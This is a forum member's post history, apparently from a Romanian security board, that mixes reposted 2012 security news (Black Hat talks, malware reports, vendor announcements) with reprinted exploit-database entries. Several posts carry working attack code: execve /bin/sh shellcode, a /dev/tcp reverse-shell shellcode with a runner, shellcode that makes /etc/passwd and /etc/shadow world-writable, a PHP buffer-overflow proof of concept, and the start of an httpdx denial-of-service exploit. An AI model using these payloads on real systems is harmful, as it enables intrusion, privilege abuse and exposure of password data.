Jump to content

DarkyAngel

Active Members
 View Profile  See their activity

  • Posts

    676

  • Joined

  • Last visited

  • Days Won

    7

 Content Type 

Everything posted by DarkyAngel

  1. DarkyAngel
    Mahdi Malware Resurrected, Cuts Ties With C&C Servers fter its command and control (C&C) servers were taken offline last week, it was assumed that the Mahdi (or Madi) operation was finished. Mahdi, the name given to malware that was discovered to be targeting systems in the Middle East, has returned however, and its newest version has some creative changes. Earlier this month, SecurityWeek reported on Mahdi after researchers at Kaspersky Lab and Seculert revealed its existence. Unfortunately, Kaspersky Lab discovered a new variant of Mahdi on Wednesday. In addition to some code optimizations, this version is able to operate without the need to use a C&C for orders. “Following the shutdown of the Madi command and control domains last week, we thought the operation is now dead. Looks like we were wrong,” Kaspersky’s Nicolas Brulez explained in a blog post. “The new version appears to have been compiled on July 25th,” he added. “It contains many interesting improvements and new features. It now has the ability to monitor VKontakte, together with Jabber conversations. It is also looking for people who visit pages containing “USA” and “gov” in their titles.” The new C&C where compromised data is delivered resides in Canada on iWeb. A full report on the newest variant is here. Sursa
  2. DarkyAngel
    PhishMe Lands $2.5 Million To Help Employees Recognize Evil Emails Just in time to throw a poolside Cabana party at the Black Hat conference, Chantilly, Virginia-based PhishMe Inc., a company that teaches security awareness to help users identify “Phishing” or targeted attacks, today announced that it has closed a $2.5 million Series A funding round. PhishMe offers valuable service to organizations, especially those populated with unsuspecting “click happy” users that can put organizations at risk of data loss and malware infection, and also put their own personal identity and financial well-being at risk. The company’s service helps change employee behavior in responding to targeted phishing attacks. So far, the company says it has trained over 3.5 million employees of government agencies, universities, and large enterprises. PhishMe offers a “spear phishing simulator” that places employees in real-world "spear phishing experiences" and presents them with appropriate training if they are found to be susceptible. In terms of putting the new cash to use, the company says they will use the funding to support expansion in the U.S. and abroad, to enhance sales and business development efforts, and to expand technology partnerships while continuing to enhance its product line. Just this week, security firm Trend Micro released a report revealing that targeted attacks against individuals and organizations are on the rise. According to Trend Micro’s Q2 2012 data, focused attacks against SMBs increased 27% when compared to last quarter’s figures. The funding round was led by Paladin Capital Group. As part of the deal, Christopher Steed, Vice President at Paladin Capital, is joining PhishMe Inc.'s Board of Directors. "This strategic partnership will bring a new and unique perspective on cyber security to employees and users worldwide. We look forward to working with Chris and hope this will be a long and beneficial relationship," said Rohyt Belani, CEO and Co-Founder, PhishMe. "At Paladin, we're proud to support innovative companies like PhishMe that are bringing to market unique solutions that solve major, worldwide problems like security in the cyber age," said Lieutenant General (Ret.) Kenneth Minihan, Managing Director at Paladin Capital. "When you look at the largest data breaches that have occurred over the past few years, it is clear that defending our most vital assets cannot be accomplished through physical and IT security alone. PhishMe's approach to using hands-on cyber security education and awareness to improve Internet safety behaviors is critical to combatting today's most advanced threats." Sursa
  3. DarkyAngel
    Qualys Adds IPv6 Support to FreeScan Service LAS VEGAS - Security B-Sides - Cloud-based security and compliance solutions provider Qualys, today announced that its FreeScan service, a free service that lets organizations scan web sites or publicly facing IP addresses for vulnerabilities, malware and SSL issues, now supports IPv6. Using FreeScan, organizations can now scan IPv6 devices to detect possible vulnerabilities and take the steps necessary to remediate them. As organizations migrate to IPv6, the proliferation of networked devices poses new challenges for security teams that many organizations may not be ready for. “If there is a lack of expertise in IPv6 networking, deploying IPv6 ready devices, such as desktops and laptops with modern operating systems, can cause problems as IPv6 traffic may bypass firewalls, intrusion detection systems and other security protections, allowing IPv6 traffic to reach unintended recipients,” the company said. “In addition, as IPv6 adoption grows, it could increasingly become a target for attackers.” "While there is a movement for organizations to move to IPv6, they may not be prepared to take the steps necessary to secure these devices," said Scott Crawford, research director for EMA. "Qualys FreeScan is a useful service that allows businesses to test the security posture of IPv6 devices on the Internet after deployment and make sure they are properly configured to help defend organizations against cyber attacks." Sursa
  4. DarkyAngel
    ai un post, vrei s? oferi un keylogger pe messenger ( pe pariu 99% ), mai ?i reînvii un topic de 2 ani. ce s? cred?
  5. DarkyAngel
    Smashing the Future: A Look Back, and the Future of Security LAS VEGAS - BLACK HAT USA - A panel of security and privacy experts engaged in a free-wheeling discussion of how enterprises have invested in security over the years and beefed up their defenses, but there was still a long way to go. Jeff Moss, founder of Black Hat, Adam Shostack, senior program manager at Microsoft's Trustworthy Computing Group, Marcus Ranum, chief security officer at Tenable Security, and Bruce Schneier, chief security technologist at BT, talked bluntly about their mistust of government, changing nature of cyber-attacks and exploits, and the future of security at a panel on the first day of the Black Hat security conference at Las Vegas. Jennifer Granick, director of civil liberties at the Stanford Law School Center for Internet and Society, acted as a moderator of the panel. The panelists had all spoken at the original Black Hat conference in 1997 and were reunited in this session to discuss what had happened in security over the years, and what the future would look like for security. There were some successes. Malware analysis and detection has made it possible for enterprises to block recognized and known threats effectively, Ranum said. Spam was another area, as “I almost never see spam in my inbox,” Schneier said. Enterprises have improved their defenses to be able to analyze and detect broad-based attacks, even as they struggle to defend against targeted attacks, he said. However, there was a lot of to be worried about, and the panel did not pull any punches in who they thought was to blame. The government wasn't doing its job in providing businesses with valuable intelligence on breaches and threats, the panelists agreed. Ranum criticized the point made earlier by the keynote speaker, Shawn Henry, a former FBI-official and currently president of CrowdStrike Services, that the private sector firms bore the brunt of protecting against sophisticated cyber-threats and nation-state attacks. “I lose my cool when I hear people from the government saying that the private sector needs to step up,” Ranum said. “I am not qualified to carry out counter-intelligence against China, that is what the government is for.” In fact, despite the insistence on information-sharing, the process has been decidedly one-way, Ranum said. Moss agreed, saying how federal officials are very open and excited about the kind of information businesses can share, but the second they are asked what the businesses can receive in return, they clam up. “The security community is flying in the dark on a 'trust us' model while we hand over all this information,” Ranum ranted. Instead of legislating security policy and breach notification, the government would be better off to use their wallet to encourage companies to change their security practices, Schneier said. The NSA can define a security standard, and go to the various vendors—the cloud, database, and software providers-- and inform that if they want government business, they have to adhere to that standard, Schneier suggested. Schneier took that a step further, saying that contractual arrangements could begin to drive security and privacy between people and companies. These contracts can specify what the security expectations are and what information and control the customer retains. People are increasingly putting their information and infrastructure in the cloud for convenience, but as a result, relinquish all control, Moss said. The government wasn't all bad. The government can jump-start technology research, drive adoption of technology within agencies and departments, and in turn force the security market to create new products, Moss said. For example, the government has played a significant role is in the development of DNSSEC and secure BGP, which is critical for the future and security of the Internet and online communications, but has almost no commercial interest, Moss said. When the panel discussed where companies should focus their security spending , Moss was unequivocal. “The best return is on your employees, Moss said, to cheers and applause from the audience. “I rely on people, not on a widget. I can get all the widgets I need for free from the open source community,” Moss said. Good security staff are important, but the company needs to also invest in managers who can understand how to put people in the right roles and get the best effort. Ranum agreed with Moss, saying that while forensics and malware specialists were critical to the security fight, generalists were also very important in order to see the bigger picture. As more and more companies outsource aspects of their business to third-party providers, such as payroll, there needs to be a generalist on staff who understands how the service will interact with other on-premise software, not a specialist in that payroll system, Ranum said. Schneier pointed out that staff needs to be familiar with the legal and regulatory environment, as well. Granick asked the panelists to weigh in on whether security will be better or worse in the future. The response was decidedly pessimistic across the board, as things will be “the same.” “We’ll get better at running,” Moss said. Schneier responded, “The bad guys will always run faster.” Sursa
  6. DarkyAngel
    Black Hat: Ex-FBI Agent Tells Private Sector to "Step It Up" LAS VEGAS - BLACK HAT USA - The Federal Bureau of Investigation revamped its approach to fighting terrorists after 9/11. Corporate America can apply those lessons to protect the networks from cyber-attackers, a former official told attendees at Black Hat security conference. Attacks have changed, and anyone can now launch a cyber-attack, but organizations haven't changed the way they view security or do business, Shawn Henry, the former executive assistant director of the FBI and currently a president of CrowdStrike Services, a division of security startup CrowdStrike, said in his keynote speech on the first day of Black Hat in Las Vegas. Until March 2012, Henry was responsible for all of the FBI's criminal investigations worldwide, including the cyber-investigations, critical incident response group, and international investigations. There needs to be a new “paradigm” in how business views security, Henry said, and the best way to do that is to take the lessons learned from protecting the physical world. The actual tactics used to launch the attacks may be different, but the theory is the same, he said. The threat from computer network attack is the most significant threat—after weapons of mass destruction--facing society, he said. "The adversary knows that if you want to harm civilized society -- take their water away, do away with their electricity," Henry told attendees. So much of the data integral to personal lives and the organization's intellectual property is stored on the network, Henry said. When attackers breach the network, it's the data being held hostage and the life of the organization that is at risk. A company could lose a decade worth of research in a matter of days with a single attack, Henry said. "Today, with a $500 laptop and an Internet connection, anyone anywhere can attack anyone, anywhere," said Henry. Many CEOs still haven't accepted the new reality yet, asking why their organizations would be a target, he said. The FBI had to change their approach and tactics after 9/11, becaise it was clear the terrorists were already inside the country, and the best way to to catch them was to work with other intelligence agencies to gather and share better intelligence, Henry said. By the same token, the private sector has to accept that companies can't keep focusing on protecting the network perimeter but acknowledge the adversaries are already inside. Once that is acknowledged, the question is why organizations aren't looking for the adversaries on their networks, Henry said. Looking for adversaries rely on the organization collecting information about what is happening on the network. But organizations can also think about creating a hostile environment for the adversary. Henry described using “denial and deception,” such as allowing cyber-criminals to steal outdated or wrong data, or just not putting certain types of data on the network in the first place. To catch the adversaries, organizations must focus on intelligence, Henry said. They need to think strategically, collect information, analyze the situation, and execute, he said. Organizations need to be focusing on granular intelligence, to be able to share high-quality information about the attacks, the origin, and even the entity behind the attacks. "We need to understand who the adversary is," Henry said, "because if we understand who they are, we can take proactive measures." He was very quick to assert that his repeated statements for the private sector to “step up” and be proactive about cyber-threats did not mean he was advocating hacking back against the originators of the threat (as that would be illegal). Instead, he believed that intelligence sharing and partnering with other organizations were important tools. Some attendees weren't swayed by Henry's impassioned call to action to “stand side by side to protect that line between good and evil.” Information sharing is not as effective if the government is sharing information the public already knows about, Kurt Baumgartner, a researcher at Kaspersky Lab told SecurityWeek. The government has to provide actionable and worthwhile intelligence, and that really hasn't been the case so far. However, the government is trying to change that to give more valuable information, Baumgartner said. At a session after Henry's keynote, Marcus Ranum, chief of security for Tenable Security criticized the premise that the responsibility for network defense was on the private sector and not the government. "I lose my cool when I hear people from the government, or formerly from the government, say the private sector needs to step up," Ranum ranted, adding. "Providing for the common defense is what the government is supposed to do." Sursa
  7. DarkyAngel
    Black Hat Survey: More than 1/3 Have Engaged in Retaliatory Hacking A survey from security firm nCircle suggests that retaliatory hacking is not universally frowned upon. In a poll of 181 attendees of the Black Hat USA 2012 conference in Las Vegas, nCircle asked "Have you ever engaged in retaliatory hacking?” Sixty-four percent said "never," 23 percent said "once," and 13 percent said "frequently." While more than a third responded in the affirmative, Tim 'TK' Keanini, CTO of nCircle, said the true percentage may be even higher. “Retaliatory hacking is a huge topic at Black Hat this year, but we should take these survey results with a grain of salt,” he said in a statement. “It’s safe to assume some respondents don’t want to admit they use retaliatory tactics. It’s very tempting to strike back out of anger and frustration. However, as infuriating as cyber criminals can be, this ‘eye for an eye’ code of justice can be extremely dangerous. “There’s a huge difference between a security expert who can qualify attackers and apply appropriate responses and a neophyte who reacts blindly," he added. "The best strategy for most companies is to forget retaliation and concentrate on improving their defenses.” Sursa
  8. DarkyAngel
    Linux x86 execve("/bin/sh") /* Title: Linux x86 execve("/bin/sh") - 28 bytes Author: Jean Pascal Pereira <pereira@secbiz.de> Web: http://0xffe4.org Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov %esp,%ebx 804806f: 89 c1 mov %eax,%ecx 8048071: 89 c2 mov %eax,%edx 8048073: b0 0b mov $0xb,%al 8048075: cd 80 int $0x80 8048077: 31 c0 xor %eax,%eax 8048079: 40 inc %eax 804807a: cd 80 int $0x80 */ #include <stdio.h> char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73" "\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x89\xc1\x89\xc2\xb0\x0b" "\xcd\x80\x31\xc0\x40\xcd\x80"; int main() { fprintf(stdout,"Lenght: %d\n",strlen(shellcode)); (*(void ()) shellcode)(); } # 1337day.com [2012-07-25] Sursa
  9. DarkyAngel
    unix/x86 Backshell[/dev/tcp],Port(30) 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* ### # Title : unix/x86 Backshell[/dev/tcp],Port(30) - 61 bytes Shellcode # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com # platform : unix/x86 - Multiple # Type : Shellc0de - 61 bytes ### # <3 <3 Greetings t0 Palestine <3 <3 # Happy 50 Year's in Independence All Algerians <3 <3 */ #include <stdio.h> #include <string.h> // UNIX Universal BackShell Reverse with /dev/tcp on port 30 - old but c00l /* xor %esi,%bh xor dword $0x653b2d31 ,$esi js short .me 0x2063 xor dword $0x3e3c31 ,%esi /dev/tcp/127.0.0.1/30;sh cmp %al, $0x26 xor dword $0x263e2031 ,%esi xor dword $0x3e322031 ,%esi xor dword $0x31 ,%esi */ char devsc[] = "\x30\x3c\x26\x31\x35\x31\x2d\x3b\x65\x78\x65\x63\x20\x31\x35" "\x31\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x32\x37" "\x2e\x30\x2e\x30\x2e\x31\x2f\x33\x30\x3b\x73\x68\x20\x3c\x26" "\x31\x35\x31\x20\x3e\x26\x31\x35\x31\x20\x32\x3e\x26\x31\x35" "\x31"; int main() { int (*dz)() = (int(*)())devsc; printf("bytes: %u\n", strlen(devsc)); dz(); } /* #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke # JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs #============================================================================================================*/ # 1337day.com [2012-07-12] Sursa
  10. DarkyAngel
    Linux x86 chmod 666 /etc/passwd & /etc/shadow Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira <pereira@secbiz.de> Web: impuls23 lab | IT Security & Development /* Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira <pereira@secbiz.de> Web: http://0xffe4.org Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9 b6 01 mov $0x1b6,%cx 8048066: 50 push %eax 8048067: 68 73 73 77 64 push $0x64777373 804806c: 68 2f 2f 70 61 push $0x61702f2f 8048071: 68 2f 65 74 63 push $0x6374652f 8048076: 89 e3 mov %esp,%ebx 8048078: b0 0f mov $0xf,%al 804807a: cd 80 int $0x80 804807c: 31 c0 xor %eax,%eax 804807e: 50 push %eax 804807f: 68 61 64 6f 77 push $0x776f6461 8048084: 68 2f 2f 73 68 push $0x68732f2f 8048089: 68 2f 65 74 63 push $0x6374652f 804808e: 89 e3 mov %esp,%ebx 8048090: b0 0f mov $0xf,%al 8048092: cd 80 int $0x80 8048094: 31 c0 xor %eax,%eax 8048096: 40 inc %eax 8048097: cd 80 int $0x80 */ #include <stdio.h> char shellcode[] = "\x31\xc0\x66\xb9\xb6\x01\x50\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3" "\xb0\x0f\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77" "\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe3" "\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80"; int main() { fprintf(stdout,"Lenght: %d\n",strlen(shellcode)); (*(void ()) shellcode)(); } # 1337day.com [2012-07-25] Sursa
  11. DarkyAngel
    Examining the patterns taken from data collected in the aftermath of more than 140 million blocked infection attempts, security vendor Trend Micro says that targeted attacks against individuals and organizations are on the rise. According to the data, focused attacks against SMBs – as apparent from the types of attempts blocked by Trend Micro – increased 27% in Q2 2012 when compared to last quarter’s figures. Trend Micro's report also outlines increasingly sophisticated attacks against individuals in the form of ATS (Automatic Transfer System) attacks. Large organizations weren't exempt either. The IXESHE attack campaign, which has existing since at least July 2009, showed cybercriminals stepping up their tactics to gain access to large multinational corporations without notice. Trend found that IXESHE has been targeting East Asian governments, electronics manufacturers, and telecommunications companies, and has used compromised servers housed inside targeted organizations as command-and-control (C&C) servers. In late May, Tom Kellermann, vice president of cybersecurity at Trend Micro, told SecurityWeek that the technique of using comprimised servers as C&C servers is being adopted by elite hacker crews, and he rated the sophistication of the IXESHE campaign as a 9.3 out of 10. Other data from Trend's Q2 report includes the rise of malicious Android applications in Q2 2012, marking a 300% increase when compared to last quarter. Moreover, ransomware attacks are making a comeback, but the mainstays (Blackhole Exploit Kit) are still proven methods of victimization for cybercriminals. “Cybercriminals are cherry-picking their targets to launch more successful campaigns,” the report notes. “Based on Trend Micro observations this quarter, cybercriminals are poised to become more aggressive, using more sophisticated tools like automatic transfer systems (ATSs) and the Blackhole Exploit Kit to enhance the power of their respective ZeuS, SpyEye, and other botnets.” The report also makes note of how Pinterest has become the social media platform of choice among criminals in Q2 2012; and examines the top 5 social engineering lures being used across all social networking sites, including Diablo 3, Instagram Android, Angry Birds Space, the London 2012 Olympics, and Tibet. Trend’s Q2 2012 report is available here. Sursa
  12. DarkyAngel
    au prins tupeu de când cu cele de la yahuu meanwhile, alt? surs? spune:
  13. DarkyAngel
    While apple releases osX 10.8.. Kaspersky Lab Launches New Security Software Suite for Mac OS X Kaspersky Lab, the Russian Internet security software maker behind highly rated consumer security software for PCs, on Monday announced Kaspersky Security for Mac, the Company’s new security suite designed to protect Mac OS X based systems. The company says its latest Mac security offering combines real-time scanning, proactive detection and cloud-based threat intelligence to help protect Mac OS X users. While Mac OS is still relatively safe compared to its PC counterparts, threats still exist, and a recent increase in malware targeting Mac OS systems has served as a wake up call. The most recent incident put Mac malware under spotlight when the Flashback malware ultimately infected upwards of 700,000 Macs back in March 2012, creating the largest Mac-based botnet ever. Aside from Malware that can infect a users’ system, other Web and email based threats and scams can put users in danger as well. In order to address other threats, Kaspersky Security for Mac includes a URL Advisor along with Anti-Phishing Technology to guard against fake or dangerous websites, a Virtual Keyboard to defeat keyloggers and screen-capture malware, and Parental Controls that can restrict content and Web sites based on category and content. “As Mac computers become more popular, they become a bigger target for cybercriminals trying to steal as much money as they can for the smallest amount of effort,” the company said in a statement. “Even if you’re not concerned about the threat to your own Mac computer, your unprotected machine can even be used to store and distribute Windows-based malware to your PC-using friends and colleagues.” In fact, a study released by Sophos earlier this year showed that 1 in 5 Macs had windows-based malware on them. Kaspersky Security for Mac looks and behaves like a typical Mac OS application, the company says. It follows the same installation process as any other OS X application, and is compatible with the latest version of Mac OS X - Mountain Lion 10.8. “It’s true that there are fewer malicious programs written for the Mac platform compared to the Windows platform” the company said. “But that doesn’t mean OS X machines are built to be inherently more secure against malware, it means cybercriminals have been focused on attacking the platform with the most potential victims. As more people use Macs, the OS X market becomes a more lucrative target.” Kaspersky Security for Mac is available immediately in The United States and Canada, priced at $39.95 for a 1-year subscription that will protect a single system, or $59.95 which includes 3-user licenses. Kaspersky Security for Mac is also available through Kaspersky ONE Universal Security, which protects multiple consumer devices. A free 30-day trial is also available. Sursa
  14. DarkyAngel
    gre?eala mea, nu mi-a s?rit în ochi când m-am uitat la topicurile de aici . rog un mod s? le uneasc? sau s? îl ?tearg? pe al meu.
  15. DarkyAngel
    Anonymous Targets Australian Government Over Proposed Changes to Privacy Laws Anons supporting OpAustralia have taken down at least ten domains maintained by the Queensland government this week, in protest of proposed changes to privacy laws. The attacks started over the weekend, as Australia’s Prime Minister was set to host a chat on Google+. “The Australian Government is attempting to strip away its citizens’ internet rights by forcing them to surrender passwords and internet usage data...Unless the Government starts acting in the best interest of its people, it will continue to bring the noise... We no longer know about many of the activities of our governments while our governments have the means to accumulate unprecedented vast banks of data about us...,” OpAustralia said in a statement. The proposed changes that the Anons were protesting would require electronic communications, such as email and data from social networking sites, or other Web platforms, to be collected and stored by local ISPs for up to two years. Additional details on the proposed changes can be seen here. On Monday, OpAustralia’s Twitter account told the government to be prepared as “something big is heading your way...” Earlier this week, data taken from compromised Queensland-based government servers appeared online. Included with the leaked data is a 194MB database, which is said to contain government tracking data. SecurityWeek was unable to confirm the details in this file with local authorities due to differences in time zones. We’ll update with more information if it becomes available. Sursa
  16. DarkyAngel
    Symantec Pushes Enrique Salem Out, Appoints New CEO Saying it was the board's judgment that it was in the best interests to make a change in the CEO position, Symantec today said that Enrique Salem, president and CEO, has stepped down effective immediately and would be replaced by Steve Bennett who will take over the role as president and chief executive officer, in addition to his continued role as chairman of the board. "The board's decision to make a leadership change was not based on any particular event or impropriety but was instead made after ongoing consideration and a deliberative process," said Dan Schulman, Symantec's newly-appointed lead director. "Enrique Salem has been a significant contributor during his 19 years' associated with Symantec, including the last three years as CEO," said Bennett. "While progress has been made over the last three years in many areas, it was the board's judgment that it was in the best interests of Symantec to make a change in the CEO." "My view is that Symantec's assets are strong and yet the company is underperforming against the opportunity," Bennett said. "I'm looking forward to working with the team to build upon the significant assets in place to help Symantec accelerate value creation for all of its stakeholders." Bennett joined Symantec's board of directors in February 2010 and became chairman in 2011. He previously was president and chief executive officer at Intuit from 2000 to 2007. Bennett joined Intuit after a 23-year career at General Electric. During his career at GE, he held a variety of key management roles in numerous areas of the business, including GE Capital e-Business, GE Capital Vendor Financial Services, GE Electrical Distribution and Control, GE Appliances, GE Medical Systems and GE Supply. He currently serves on boards at American Airlines and parent company AMR Corporation, along with Qualcomm. He graduated from the University of Wisconsin with a bachelor's degree in finance and real estate. "We are fortunate as a board to be able to name Steve as CEO and achieve continuity in leadership,” Schulman said. “Steve understands the company well, had a great track record at Intuit and General Electric and is a perfect fit for moving the company forward." The news comes the same day that company reported the results of its first quarter of fiscal year 2013, ended June 29, 2012. The company reported GAAP revenue for the fiscal first quarter of $1.668 billion, up 1 percent year-over-year and up 4 percent after adjusting for currency. Sursa
  17. DarkyAngel
    Large Global Banks Still Plagued by Conficker, Zeus Malware: Report Some of the world's largest banks are operating while infected with serious malware, according to a recent report. An analysis of 24 of the world's largest banks showed that 18 banks contained malicious infections, including Conficker, DNSChanger, and Gameover Zeus, BlackHole Exploit Kit, and Fake AV, Lookingglass Cyber Solutions said in a report released July 25. Researchers also were able to track “tens of thousands” of machines infected by Flashback in March, Derek Gabbard, CEO of Lookingglass Cyber Solutions, told SecurityWeek. Lookingglass tracked over 104 malicious IP addresses from around the world since Janaury to compile this analysis. In March alone, researchers tracked 42 million infected IP addresses and found 40 percent had multiple infections. Interestingly, Lookingglass was able to determine that a significant majority of these infected machines were not public-facing systems, such as a Web server or transaction systems, Gabbard said. Even after three years, there was a “very substantial Conficker infection,” Gabbard said. The Conficker Working Group has been working for the past three years to help organizations and users mitigate and remediate their machines infected with the Conficker worm. Even so, the worm remains entrenched in the financial services industry, with 10 of the 24 banks analyzed still having infected machines, Lookingglass found. According to Microsoft's Security Intelligence Report released in April 2012, Microsoft said the Conficker worm was detected approximately 220 million times worldwide in the past two and a half years. “Nothing surprises me anymore,” Gabbard said, adding that he was “never surprised to see things we thought were old and dead crop back up.” While Conficker was the most common, Lookingglass also found a lot of DNSChanger infections among these banks, despite various outreach programs this spring to educate users about the malware. However, Gabbard admitted that he had expected to see more DNSChanger infections than what was observed, so the cleanup efforts were effective to some part. There were also machines infected with malware to become part of the Cutwail botnet, Gabbard said. Lookingglass wasn't picking on the financial services industry in the report. Of the 17 industries Lookingglass monitored, 14 were infected with “high level threats,” the company said. Compared to other sectors, financial services companies are substantially faster than others when it comes to remediation, Gabbard said. Gabbard also said he would be surprised if there was any sector who could claim to not still be battling Conficker infections. Lookingglass researchers determined that many of the organizations had detected and cleaned up the infections initially, but had been re-infected by partners and suppliers who were similar infected. Malware from “unclean” networks re-infect previously cleaned networks, “creating a cycle of re-infection among partner and supply chain networks, the company said. This is a problem when the industry shares a common infrastructure, as is the case within the financial services sector. Organizations are not monitoring these re-infections. “With cyber attacks becoming more intricate and sophisticated, not only do organizations put themselves at risk if they don’t take these threats seriously, they also become a liability to their customers and partners,” said Gabbard. The company collected information from various sources, including blacklist blockers, spam lists, feeds from threat intelligence providers, and open source lists, Gabbard said. Lookingglass has been collecting and analyzing this kind of data for a long time and sharing relevant insights with customers, but this is the first time the company has released the data to the public, Gabbard said. Sursa
  18. DarkyAngel
    Nessus On Android 1.0.1 Credential Disclosure 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ############################################# 1 0 Nessus On Android 1.0.1 Credential Disclosure 1 1 ############################################# 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Nessus app for android version 1.0.1 The app allows user to save nessus server info IP/username/password. The app saves this info to /sdcard/servers.id This file can be viewed with notepad and password is right there in plain text. this means any app on the system can see that info and possibly transmit it to an attacker. # 1337day.com [2012-07-24] Sursa
  19. DarkyAngel
    PHP 6.0 openssl_verify() Local Buffer Overflow PoC <?php // ================================================================================== // // PHP 6.0 openssl_verify() Local Buffer Overflow PoC // // Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow. // // Local Buffer Overflow // Author: Pr0T3cT10n <pr0t3ct10n@gmail.com> // // ================================================================================== // // REGISTERS: // EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8 // EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...." // ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...." // EIP 00410041 // // ================================================================================== $buffer = str_repeat("A", 1000); openssl_verify(1,1,$buffer); ?> # 1337day.com [2012-07-20] Sursa
  20. DarkyAngel
    httpdx v1.5.4 Remote HTTP Server DoS (using wildcards) Date: 18 July 2012 #!/usr/bin/perl -w #====================================================================== # Exploit Title: httpdx v1.5.4 Remote HTTP Server DoS (using wildcards) # Date: 18 July 2012 # Exploit Author: st3n [at sign] funoverip [dot] net # Vendor Homepage: http://httpdx.sourceforge.net # Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download # Version: 1.5.4 # Tested on: WinXP SP3 #====================================================================== # Additional notes: # - One request is enough # - On crash: Access violation when writing to [41414141] # - The value x01 is written to [EDI] at the following instruction # MOV BYTE PTR DS:[EDI],AL # # In msvcrt.dll # ------------- # # 77C470D0 8A06 MOV AL,BYTE PTR DS:[ESI] # 77C470D2 8807 MOV BYTE PTR DS:[EDI],AL <===== HERE # 77C470D4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] # 77C470D7 5E POP ESI # 77C470D8 5F POP EDI # 77C470D9 C9 LEAVE # 77C470DA C3 RETN # # Registers # ------------- # # EAX 41414101 # ECX FFFFFFFD # EDX 00000003 # EBX 00423001 ASCII "&>" # ESP 01058B9C # EBP 01058BA4 # ESI 003EA2E0 # EDI 41414141 <============= HERE # EIP 77C470D2 msvcrt.77C470D2 # # Crash output : # -------------- # httpdx 1.5.4 - Started # # [http/ftp]://192.168.0.10/ # # ffs wtf happened? # #====================================================================== 